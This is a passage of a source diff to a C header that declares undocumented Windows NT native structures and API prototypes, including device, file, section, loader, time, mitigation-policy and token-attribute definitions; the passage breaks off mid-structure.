+#define FILE_DEVICE_UCM 0x00000057
+#define FILE_DEVICE_UCMTCPCI 0x00000058
+#define FILE_DEVICE_PERSISTENT_MEMORY 0x00000059
+#define FILE_DEVICE_NVDIMM 0x0000005a
+#define FILE_DEVICE_HOLOGRAPHIC 0x0000005b
+#define FILE_DEVICE_SDFXHCI 0x0000005c
+#define FILE_DEVICE_UCMUCSI 0x0000005d
#define FILE_BYTE_ALIGNMENT 0x00000000
#define FILE_WORD_ALIGNMENT 0x00000001
@@ -3635,36 +3728,56 @@ enum _KOBJECTS {
#define DPC_NORMAL 0
#define DPC_THREADED 1
-typedef struct _DEVICE_OBJECT {
- CSHORT Type;
- USHORT Size;
- LONG ReferenceCount;
- struct _DRIVER_OBJECT *DriverObject;
- struct _DEVICE_OBJECT *NextDevice;
- struct _DEVICE_OBJECT *AttachedDevice;
- struct _IRP *CurrentIrp;
- PVOID Timer;
- ULONG Flags;
- ULONG Characteristics;
- __volatile PVPB Vpb;
- PVOID DeviceExtension;
- DEVICE_TYPE DeviceType;
- CCHAR StackSize;
+#if _MSC_VER >= 1200
+#pragma warning(push)
+#pragma warning(disable:4324) // structure was padded due to __declspec(align())
+#endif
+
+typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT) _DEVICE_OBJECT {
+ CSHORT Type;
+ USHORT Size;
+ LONG ReferenceCount;
+ struct _DRIVER_OBJECT* DriverObject;
+ struct _DEVICE_OBJECT* NextDevice;
+ struct _DEVICE_OBJECT* AttachedDevice;
+ struct _IRP* CurrentIrp;
+ PIO_TIMER Timer;
+ ULONG Flags; // See above: DO_...
+ ULONG Characteristics; // See ntioapi: FILE_...
+ __volatile PVPB Vpb;
+ PVOID DeviceExtension;
+ DEVICE_TYPE DeviceType;
+ CCHAR StackSize;
union {
- LIST_ENTRY ListEntry;
+ LIST_ENTRY ListEntry;
WAIT_CONTEXT_BLOCK Wcb;
} Queue;
- ULONG AlignmentRequirement;
- KDEVICE_QUEUE DeviceQueue;
- KDPC Dpc;
- ULONG ActiveThreadCount;
- PSECURITY_DESCRIPTOR SecurityDescriptor;
- KEVENT DeviceLock;
- USHORT SectorSize;
- USHORT Spare1;
- struct _DEVOBJ_EXTENSION * DeviceObjectExtension;
- PVOID Reserved;
-} DEVICE_OBJECT, *PDEVICE_OBJECT;
+ ULONG AlignmentRequirement;
+ KDEVICE_QUEUE DeviceQueue;
+ KDPC Dpc;
+
+ //
+ // The following field is for exclusive use by the filesystem to keep
+ // track of the number of Fsp threads currently using the device
+ //
+
+ ULONG ActiveThreadCount;
+ PSECURITY_DESCRIPTOR SecurityDescriptor;
+ KEVENT DeviceLock;
+
+ USHORT SectorSize;
+ USHORT Spare1;
+
+ struct _DEVOBJ_EXTENSION* DeviceObjectExtension;
+ PVOID Reserved;
+
+} DEVICE_OBJECT;
+
+typedef struct _DEVICE_OBJECT* PDEVICE_OBJECT;
+
+#if _MSC_VER >= 1200
+#pragma warning(pop)
+#endif
typedef struct _DEVOBJ_EXTENSION {
@@ -3919,6 +4032,61 @@ typedef struct _DRIVER_OBJECT {
} DRIVER_OBJECT;
typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT;
+//
+// The following structure is pointed to by the SectionObject pointer field
+// of a file object, and is allocated by the various NT file systems.
+//
+
+typedef struct _SECTION_OBJECT_POINTERS {
+ PVOID DataSectionObject;
+ PVOID SharedCacheMap;
+ PVOID ImageSectionObject;
+} SECTION_OBJECT_POINTERS;
+typedef SECTION_OBJECT_POINTERS* PSECTION_OBJECT_POINTERS;
+
+//
+// Define the format of a completion message.
+//
+
+typedef struct _IO_COMPLETION_CONTEXT {
+ PVOID Port;
+ PVOID Key;
+} IO_COMPLETION_CONTEXT, * PIO_COMPLETION_CONTEXT;
+
+typedef struct _FILE_OBJECT {
+ CSHORT Type;
+ CSHORT Size;
+ PDEVICE_OBJECT DeviceObject;
+ PVPB Vpb;
+ PVOID FsContext;
+ PVOID FsContext2;
+ PSECTION_OBJECT_POINTERS SectionObjectPointer;
+ PVOID PrivateCacheMap;
+ NTSTATUS FinalStatus;
+ struct _FILE_OBJECT* RelatedFileObject;
+ BOOLEAN LockOperation;
+ BOOLEAN DeletePending;
+ BOOLEAN ReadAccess;
+ BOOLEAN WriteAccess;
+ BOOLEAN DeleteAccess;
+ BOOLEAN SharedRead;
+ BOOLEAN SharedWrite;
+ BOOLEAN SharedDelete;
+ ULONG Flags;
+ UNICODE_STRING FileName;
+ LARGE_INTEGER CurrentByteOffset;
+ __volatile ULONG Waiters;
+ __volatile ULONG Busy;
+ PVOID LastLock;
+ KEVENT Lock;
+ KEVENT Event;
+ __volatile PIO_COMPLETION_CONTEXT CompletionContext;
+ KSPIN_LOCK IrpListLock;
+ LIST_ENTRY IrpList;
+ __volatile PVOID FileObjectExtension;
+} FILE_OBJECT;
+typedef struct _FILE_OBJECT* PFILE_OBJECT;
+
#define RESOURCE_TYPE_LEVEL 0
#define RESOURCE_NAME_LEVEL 1
#define RESOURCE_LANGUAGE_LEVEL 2
@@ -4690,12 +4858,25 @@ typedef struct _GDI_SHARED_MEMORY {
GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT];
} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY;
+#ifndef FLS_MAXIMUM_AVAILABLE
#define FLS_MAXIMUM_AVAILABLE 128
+#endif
+
+#ifndef TLS_MINIMUM_AVAILABLE
#define TLS_MINIMUM_AVAILABLE 64
+#endif
+
+#ifndef TLS_EXPANSION_SLOTS
#define TLS_EXPANSION_SLOTS 1024
+#endif
+#ifndef DOS_MAX_COMPONENT_LENGTH
#define DOS_MAX_COMPONENT_LENGTH 255
+#endif
+
+#ifndef DOS_MAX_PATH_LENGTH
#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)
+#endif
typedef struct _CURDIR {
UNICODE_STRING DosPath;
@@ -5072,88 +5253,6 @@ __inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmen
** PEB/TEB END
*/
-/*
-** ALPC START
-*/
-
-typedef struct _PORT_MESSAGE {
- union {
- struct {
- CSHORT DataLength;
- CSHORT TotalLength;
- } s1;
- ULONG Length;
- } u1;
- union {
- struct {
- CSHORT Type;
- CSHORT DataInfoOffset;
- } s2;
- ULONG ZeroInit;
- } u2;
- union {
- CLIENT_ID ClientId;
- double DoNotUseThisField; // Force quadword alignment
- } u3;
- ULONG MessageId;
- union {
- ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message
- ULONG CallbackId; // Only valid on LPC_REQUEST message
- } u4;
- UCHAR Reserved[8];
-} PORT_MESSAGE, *PPORT_MESSAGE;
-
-// end_ntsrv
-
-typedef struct _PORT_DATA_ENTRY {
- PVOID Base;
- ULONG Size;
-} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY;
-
-typedef struct _PORT_DATA_INFORMATION {
- ULONG CountDataEntries;
- PORT_DATA_ENTRY DataEntries[1];
-} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION;
-
-#define LPC_REQUEST 1
-#define LPC_REPLY 2
-#define LPC_DATAGRAM 3
-#define LPC_LOST_REPLY 4
-#define LPC_PORT_CLOSED 5
-#define LPC_CLIENT_DIED 6
-#define LPC_EXCEPTION 7
-#define LPC_DEBUG_EVENT 8
-#define LPC_ERROR_EVENT 9
-#define LPC_CONNECTION_REQUEST 10
-
-#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE)
-#define PORT_MAXIMUM_MESSAGE_LENGTH 256
-
-typedef struct _LPC_CLIENT_DIED_MSG {
- PORT_MESSAGE PortMsg;
- LARGE_INTEGER CreateTime;
-} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG;
-
-//#pragma pack(push, 1)
-typedef struct _PORT_VIEW {
- ULONG Length;
- HANDLE SectionHandle;
- ULONG SectionOffset;
- SIZE_T ViewSize;
- PVOID ViewBase;
- PVOID ViewRemoteBase;
-} PORT_VIEW, *PPORT_VIEW;
-
-typedef struct _REMOTE_PORT_VIEW {
- ULONG Length;
- SIZE_T ViewSize;
- PVOID ViewBase;
-} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW;
-//#pragma pack(pop)
-/*
-** ALPC END
-*/
-
/*
** MITIGATION POLICY START
*/
@@ -5283,13 +5382,37 @@ typedef struct tagPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 {
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10, *PPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10;
+typedef struct _PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {
+ union {
+ DWORD Flags;
+ struct {
+ DWORD SmtBranchTargetIsolation : 1;
+ DWORD IsolateSecurityDomain : 1;
+ DWORD DisablePageCombine : 1;
+ DWORD SpeculativeStoreBypassDisable : 1;
+ DWORD ReservedFlags : 28;
+ } DUMMYSTRUCTNAME;
+ } DUMMYUNIONNAME;
+} PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10, *PPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10;
+
+typedef struct _PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {
+ union {
+ DWORD Flags;
+ struct {
+ DWORD DisallowWin32kSystemCalls : 1;
+ DWORD AuditDisallowWin32kSystemCalls : 1;
+ DWORD ReservedFlags : 30;
+ } DUMMYSTRUCTNAME;
+ } DUMMYUNIONNAME;
+} PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10;
+
typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {
PROCESS_MITIGATION_POLICY Policy;
union
{
PROCESS_MITIGATION_ASLR_POLICY ASLRPolicy;
PROCESS_MITIGATION_STRICT_HANDLE_CHECK_POLICY StrictHandleCheckPolicy;
- PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY SystemCallDisablePolicy;
+ PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 SystemCallDisablePolicy;
PROCESS_MITIGATION_EXTENSION_POINT_DISABLE_POLICY ExtensionPointDisablePolicy;
PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 DynamicCodePolicy;
PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 ControlFlowGuardPolicy;
@@ -5299,6 +5422,7 @@ typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {
PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 SystemCallFilterPolicy;
PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 PayloadRestrictionPolicy;
PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 ChildProcessPolicy;
+ PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 SideChannelIsolationPolicy;
};
} PROCESS_MITIGATION_POLICY_INFORMATION, *PPROCESS_MITIGATION_POLICY_INFORMATION;
@@ -5589,9 +5713,82 @@ typedef struct _ESERVERSILO_GLOBALS {
** SILO END
*/
+/*
+** SOFTWARE LICENSING START
+*/
+#pragma pack(push, 1)
+typedef struct _SL_CACHE_VALUE_DESCRIPTOR {
+ USHORT Size;
+ USHORT NameLength;
+ USHORT Type;
+ USHORT DataLength;
+ ULONG Attributes;
+ ULONG Reserved;
+ WCHAR Name[ANYSIZE_ARRAY];
+} SL_CACHE_VALUE_DESCRIPTOR, *PSL_CACHE_VALUE_DESCRIPTOR;
+typedef SL_CACHE_VALUE_DESCRIPTOR SL_KMEM_CACHE_VALUE_DESCRIPTOR;
+#pragma pack(pop)
+
+typedef struct _SL_CACHE {
+ ULONG TotalSize;
+ ULONG SizeOfData;
+ ULONG SignatureSize;
+ ULONG Flags;
+ ULONG Version;
+ SL_KMEM_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY];
+} SL_CACHE, *PSL_CACHE;
+typedef SL_CACHE SL_KMEM_CACHE;
+
+typedef struct _SL_APPX_CACHE_VALUE_DESCRIPTOR {
+ UCHAR HashedName[32];
+ ULONGLONG Expiration;
+ ULONG DataSize;
+ WCHAR Name[ANYSIZE_ARRAY];
+} SL_APPX_CACHE_VALUE_DESCRIPTOR, *PSL_APPX_CACHE_VALUE_DESCRIPTOR;
+
+typedef struct _SL_APPX_CACHE {
+ ULONG Version;
+ ULONG Flags;
+ ULONG DataSize;
+ ULONGLONG DataCheckSum;
+ SL_APPX_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY];
+} SL_APPX_CACHE, *PSL_APPX_CACHE;
+
+
+/*
+** SOFTWARE LICENSING END
+*/
+
+
/*
** LDR START
*/
+//
+// Dll Characteristics for LdrLoadDll
+//
+#define LDR_IGNORE_CODE_AUTHZ_LEVEL 0x00001000
+
+//
+// LdrAddRef Flags
+//
+#define LDR_ADDREF_DLL_PIN 0x00000001
+
+//
+// LdrLockLoaderLock Flags
+//
+#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001
+#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002
+
+//
+// LdrUnlockLoaderLock Flags
+//
+#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001
+
+//
+// LdrGetDllHandleEx Flags
+//
+#define LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT 0x00000001
+#define LDR_GET_DLL_HANDLE_EX_PIN 0x00000002
typedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(
_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
@@ -5804,6 +6001,12 @@ LdrQueryImageFileExecutionOptions(
_In_ ULONG BufferSize,
_Out_opt_ PULONG ResultSize);
+NTSYSAPI
+BOOLEAN
+NTAPI
+LdrIsModuleSxsRedirected( //LdrEntry->Flags->Redirected
+ _In_ PVOID DllHandle);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -5961,6 +6164,9 @@ CsrClientConnectToServer(
*
************************************************************************************/
+#define RTL_DUPLICATE_UNICODE_STRING_NULL_TERMINATE (0x00000001)
+#define RTL_DUPLICATE_UNICODE_STRING_ALLOCATE_NULL_STRING (0x00000002)
+
#ifndef RtlInitEmptyUnicodeString
#define RtlInitEmptyUnicodeString(_ucStr,_buf,_bufSize) \
((_ucStr)->Buffer = (_buf), \
@@ -6114,6 +6320,14 @@ RtlAnsiStringToUnicodeString(
_In_ PCANSI_STRING SourceString,
_In_ BOOLEAN AllocateDestinationString);
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlUnicodeStringToAnsiString(
+ _Inout_ PANSI_STRING DestinationString,
+ _In_ PUNICODE_STRING SourceString,
+ _In_ BOOLEAN AllocateDestinationString);
+
NTSYSAPI
WCHAR
NTAPI
@@ -6137,13 +6351,6 @@ RtlDosPathNameToNtPathName_U(
_Out_opt_ PWSTR *FilePart,
_Reserved_ PVOID Reserved);
-NTSYSAPI
-PWSTR
-NTAPI
-RtlIpv4AddressToStringW(
- _In_ const struct in_addr *Addr,
- _Out_ PWSTR S);
-
NTSYSAPI
LONG
NTAPI
@@ -6340,29 +6547,104 @@ RtlpEnsureBufferSize(
} \
} while (0)
+
/************************************************************************************
*
-* RTL Process/Thread API.
+* RTL Integer conversion API.
*
************************************************************************************/
-typedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)(
- PRTL_USER_PROCESS_PARAMETERS ProcessParameters
- );
+NTSYSAPI
+PWSTR
+NTAPI
+RtlIpv4AddressToStringW(
+ _In_ const struct in_addr *Addr,
+ _Out_ PWSTR S);
-typedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)(
- PVOID ThreadParameter
- );
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlIpv4StringToAddressW(
+ _In_ PCWSTR AddressString,
+ _In_ BOOLEAN Strict,
+ _Out_ LPCWSTR *Terminator,
+ _Out_ struct in_addr *Address);
-typedef struct _RTL_USER_PROCESS_INFORMATION {
- ULONG Length;
- HANDLE Process;
- HANDLE Thread;
- CLIENT_ID ClientId;
- SECTION_IMAGE_INFORMATION ImageInformation;
-} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;
+//taken from ph2
-//
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlIntegerToChar(
+ _In_ ULONG Value,
+ _In_opt_ ULONG Base,
+ _In_ LONG OutputLength,
+ _Out_ PSTR String);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlCharToInteger(
+ _In_ PSTR String,
+ _In_opt_ ULONG Base,
+ _Out_ PULONG Value);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlLargeIntegerToChar(
+ _In_ PLARGE_INTEGER Value,
+ _In_opt_ ULONG Base,
+ _In_ LONG OutputLength,
+ _Out_ PSTR String);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlIntegerToUnicodeString(
+ _In_ ULONG Value,
+ _In_opt_ ULONG Base,
+ _Inout_ PUNICODE_STRING String);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlInt64ToUnicodeString(
+ _In_ ULONGLONG Value,
+ _In_opt_ ULONG Base,
+ _Inout_ PUNICODE_STRING String);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlUnicodeStringToInteger(
+ _In_ PUNICODE_STRING String,
+ _In_opt_ ULONG Base,
+ _Out_ PULONG Value);
+
+/************************************************************************************
+*
+* RTL Process/Thread API.
+*
+************************************************************************************/
+
+typedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)(
+ PRTL_USER_PROCESS_PARAMETERS ProcessParameters
+ );
+
+typedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)(
+ PVOID ThreadParameter
+ );
+
+typedef struct _RTL_USER_PROCESS_INFORMATION {
+ ULONG Length;
+ HANDLE Process;
+ HANDLE Thread;
+ CLIENT_ID ClientId;
+ SECTION_IMAGE_INFORMATION ImageInformation;
+} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;
+
+//
// This structure is used only by Wow64 processes. The offsets
// of structure elements should the same as viewed by a native Win64 application.
//
@@ -7059,7 +7341,10 @@ RtlCopySecurityDescriptor(
_In_ PSECURITY_DESCRIPTOR InputSecurityDescriptor,
_Out_ PSECURITY_DESCRIPTOR *OutputSecurityDescriptor);
-FORCEINLINE LUID NTAPI RtlConvertLongToLuid(
+FORCEINLINE
+LUID
+NTAPI
+RtlConvertLongToLuid(
_In_ LONG Long
)
{
@@ -7072,6 +7357,20 @@ FORCEINLINE LUID NTAPI RtlConvertLongToLuid(
return(TempLuid);
}
+FORCEINLINE
+LUID
+RtlConvertUlongToLuid(
+ _In_ ULONG Ulong
+)
+{
+ LUID tempLuid;
+
+ tempLuid.LowPart = Ulong;
+ tempLuid.HighPart = 0;
+
+ return tempLuid;
+}
+
NTSYSAPI
ULONG
NTAPI
@@ -7439,6 +7738,21 @@ RtlImageRvaToVa(
_In_ ULONG Rva,
_Inout_opt_ PIMAGE_SECTION_HEADER *LastRvaSection);
+NTSYSAPI
+PVOID
+NTAPI
+RtlFindExportedRoutineByName(
+ _In_ PVOID BaseOfImage,
+ _In_ PSTR RoutineName);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlGuardCheckLongJumpTarget(
+ _In_ PVOID PcValue,
+ _In_ BOOL IsFastFail,
+ _Out_ PBOOL IsLongJumpTarget);
+
/************************************************************************************
*
* RTL Time API.
@@ -7452,6 +7766,14 @@ RtlSecondsSince1970ToTime(
_In_ ULONG ElapsedSeconds,
_Out_ PLARGE_INTEGER Time);
+NTSYSAPI
+BOOLEAN
+NTAPI
+RtlTimeToSecondsSince1970(
+ _In_ PLARGE_INTEGER Time,
+ _Out_ PULONG ElapsedSeconds);
+
+
NTSYSAPI
VOID
NTAPI
@@ -7480,6 +7802,20 @@ RtlTimeFieldsToTime(
_In_ PTIME_FIELDS TimeFields,
_Out_ PLARGE_INTEGER Time);
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlSystemTimeToLocalTime(
+ _In_ PLARGE_INTEGER SystemTime,
+ _Out_ PLARGE_INTEGER LocalTime);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlLocalTimeToSystemTime(
+ _In_ PLARGE_INTEGER LocalTime,
+ _Out_ PLARGE_INTEGER SystemTime);
+
/************************************************************************************
*
* RTL Debug Support API.
@@ -7493,6 +7829,15 @@ DbgPrint(
_In_z_ _Printf_format_string_ PCH Format,
...);
+NTSYSAPI
+ULONG
+STDAPIVCALLTYPE
+DbgPrintEx(
+ _In_ ULONG ComponentId,
+ _In_ ULONG Level,
+ _In_z_ _Printf_format_string_ PSTR Format,
+ ...);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -7895,6 +8240,18 @@ NTAPI
RtlDoesFileExists_U(
_In_ PCWSTR FileName);
+NTSYSAPI
+ULONG
+NTAPI
+RtlGetLongestNtPathLength(
+ VOID);
+
+NTSYSAPI
+BOOLEAN
+NTAPI
+RtlAreLongPathsEnabled(
+ VOID);
+
/************************************************************************************
*
* RTL Boundary Descriptor API.
@@ -8633,6 +8990,41 @@ NtDeletePrivateNamespace(
*
************************************************************************************/
+typedef struct _OBJECT_SYMBOLIC_LINK_V1 { //pre Win10 TH1
+ LARGE_INTEGER CreationTime;
+ UNICODE_STRING LinkTarget;
+ ULONG DosDeviceDriveIndex;
+} OBJECT_SYMBOLIC_LINK_V1, *POBJECT_SYMBOLIC_LINK_V1;
+
+typedef struct _OBJECT_SYMBOLIC_LINK_V2 { //Win10 TH1/TH2
+ LARGE_INTEGER CreationTime;
+ UNICODE_STRING LinkTarget;
+ ULONG DosDeviceDriveIndex;
+ ULONG Flags;
+} OBJECT_SYMBOLIC_LINK_V2, *POBJECT_SYMBOLIC_LINK_V2;
+
+typedef struct _OBJECT_SYMBOLIC_LINK_V3 { //Win10 RS1
+ LARGE_INTEGER CreationTime;
+ UNICODE_STRING LinkTarget;
+ ULONG DosDeviceDriveIndex;
+ ULONG Flags;
+ ULONG AccessMask;
+} OBJECT_SYMBOLIC_LINK_V3, *POBJECT_SYMBOLIC_LINK_V3;
+
+typedef struct _OBJECT_SYMBOLIC_LINK_V4 { //Win10 RS2+
+ LARGE_INTEGER CreationTime;
+ union {
+ UNICODE_STRING LinkTarget;
+ struct {
+ PVOID Callback;
+ PVOID CallbackContext;
+ };
+ } u1;
+ ULONG DosDeviceDriveIndex;
+ ULONG Flags;
+ ULONG AccessMask;
+} OBJECT_SYMBOLIC_LINK_V4, *POBJECT_SYMBOLIC_LINK_V4;
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -8712,7 +9104,7 @@ NtCreateMailslotFile(
_In_ ULONG MaximumMessageSize,
_In_ PLARGE_INTEGER ReadTimeout);
-NTSYSCALLAPI
+NTSYSAPI
NTSTATUS
NTAPI
NtDeviceIoControlFile(
@@ -8862,6 +9254,21 @@ NtQueryDirectoryFile(
_In_opt_ PUNICODE_STRING FileName,
_In_ BOOLEAN RestartScan);
+NTSYSCALLAPI
+NTSTATUS
+NTAPI
+NtQueryDirectoryFileEx(
+ _In_ HANDLE FileHandle,
+ _In_opt_ HANDLE Event,
+ _In_opt_ PIO_APC_ROUTINE ApcRoutine,
+ _In_opt_ PVOID ApcContext,
+ _Out_ PIO_STATUS_BLOCK IoStatusBlock,
+ _Out_ PVOID FileInformation,
+ _In_ ULONG Length,
+ _In_ FILE_INFORMATION_CLASS FileInformationClass,
+ _In_ ULONG QueryFlags,
+ _In_opt_ PUNICODE_STRING FileName);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -8984,7 +9391,8 @@ NtLoadDriver(
NTSYSAPI
NTSTATUS
-NTAPI NtUnloadDriver(
+NTAPI
+NtUnloadDriver(
_In_ PUNICODE_STRING DriverServiceName);
NTSYSAPI
@@ -9000,6 +9408,14 @@ NtLoadHotPatch(
*
************************************************************************************/
+#define MEM_EXECUTE_OPTION_DISABLE 0x1
+#define MEM_EXECUTE_OPTION_ENABLE 0x2
+#define MEM_EXECUTE_OPTION_DISABLE_THUNK_EMULATION 0x4
+#define MEM_EXECUTE_OPTION_PERMANENT 0x8
+#define MEM_EXECUTE_OPTION_EXECUTE_DISPATCH_ENABLE 0x10
+#define MEM_EXECUTE_OPTION_IMAGE_DISPATCH_ENABLE 0x20
+#define MEM_EXECUTE_OPTION_VALID_FLAGS 0x3f
+
typedef enum _MEMORY_PARTITION_INFORMATION_CLASS {
SystemMemoryPartitionInformation,
SystemMemoryPartitionMoveMemory,
@@ -9069,6 +9485,21 @@ NtCreateSection(
_In_ ULONG AllocationAttributes,
_In_opt_ HANDLE FileHandle);
+//taken from ph2
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateSectionEx(
+ _Out_ PHANDLE SectionHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_opt_ PLARGE_INTEGER MaximumSize,
+ _In_ ULONG SectionPageProtection,
+ _In_ ULONG AllocationAttributes,
+ _In_opt_ HANDLE FileHandle,
+ _In_ PMEM_EXTENDED_PARAMETER ExtendedParameters,
+ _In_ ULONG ExtendedParameterCount);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -9083,7 +9514,7 @@ NTAPI
NtMapViewOfSection(
_In_ HANDLE SectionHandle,
_In_ HANDLE ProcessHandle,
- _Inout_ PVOID *BaseAddress,
+ _Inout_ _At_(*BaseAddress, _Readable_bytes_(*ViewSize) _Writable_bytes_(*ViewSize) _Post_readable_byte_size_(*ViewSize)) PVOID *BaseAddress,
_In_ ULONG_PTR ZeroBits,
_In_ SIZE_T CommitSize,
_Inout_opt_ PLARGE_INTEGER SectionOffset,
@@ -9092,22 +9523,12 @@ NtMapViewOfSection(
_In_ ULONG AllocationType,
_In_ ULONG Win32Protect);
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQuerySection(
- _In_ HANDLE SectionHandle,
- _In_ SECTION_INFORMATION_CLASS SectionInformationClass,
- _Out_ PVOID SectionInformation,
- _In_ SIZE_T SectionInformationLength,
- _Out_opt_ PSIZE_T ReturnLength);
-
NTSYSAPI
NTSTATUS
NTAPI
NtUnmapViewOfSection(
_In_ HANDLE ProcessHandle,
- _In_ PVOID BaseAddress);
+ _In_opt_ PVOID BaseAddress);
NTSYSAPI
NTSTATUS
@@ -9117,6 +9538,16 @@ NtUnmapViewOfSectionEx(
_In_opt_ PVOID BaseAddress,
_In_ ULONG Flags);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtQuerySection(
+ _In_ HANDLE SectionHandle,
+ _In_ SECTION_INFORMATION_CLASS SectionInformationClass,
+ _Out_writes_bytes_(SectionInformationLength) PVOID SectionInformation,
+ _In_ SIZE_T SectionInformationLength,
+ _Out_opt_ PSIZE_T ReturnLength);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -9156,6 +9587,13 @@ NtFreeUserPhysicalPages(
_Inout_ PULONG_PTR NumberOfPages,
_In_reads_(*NumberOfPages) PULONG_PTR UserPfnArray);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtAreMappedFilesTheSame(
+ _In_ PVOID File1MappedAsAnImage,
+ _In_ PVOID File2MappedAsFile);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -9188,6 +9626,87 @@ NtCreatePartition(
* Token API.
*
************************************************************************************/
+//
+// This part is taken from PH ntseapi.h.
+//
+
+// Types
+
+#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INVALID 0x00
+#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INT64 0x01
+#define TOKEN_SECURITY_ATTRIBUTE_TYPE_UINT64 0x02
+#define TOKEN_SECURITY_ATTRIBUTE_TYPE_STRING 0x03
+#define TOKEN_SECURITY_ATTRIBUTE_TYPE_FQBN 0x04
+#define TOKEN_SECURITY_ATTRIBUTE_TYPE_SID 0x05
+#define TOKEN_SECURITY_ATTRIBUTE_TYPE_BOOLEAN 0x06
+#define TOKEN_SECURITY_ATTRIBUTE_TYPE_OCTET_STRING 0x10
+
+// Flags
+
+#define TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE 0x0001
+#define TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE 0x0002
+#define TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY 0x0004
+#define TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT 0x0008
+#define TOKEN_SECURITY_ATTRIBUTE_DISABLED 0x0010
+#define TOKEN_SECURITY_ATTRIBUTE_MANDATORY 0x0020
+#define TOKEN_SECURITY_ATTRIBUTE_COMPARE_IGNORE 0x0040
+
+#define TOKEN_SECURITY_ATTRIBUTE_VALID_FLAGS ( \
+ TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE | \
+ TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE | \
+ TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY | \
+ TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT | \
+ TOKEN_SECURITY_ATTRIBUTE_DISABLED | \
+ TOKEN_SECURITY_ATTRIBUTE_MANDATORY)
+
+#define TOKEN_SECURITY_ATTRIBUTE_CUSTOM_FLAGS 0xffff0000
+
+typedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE
+{
+ ULONG64 Version;
+ UNICODE_STRING Name;
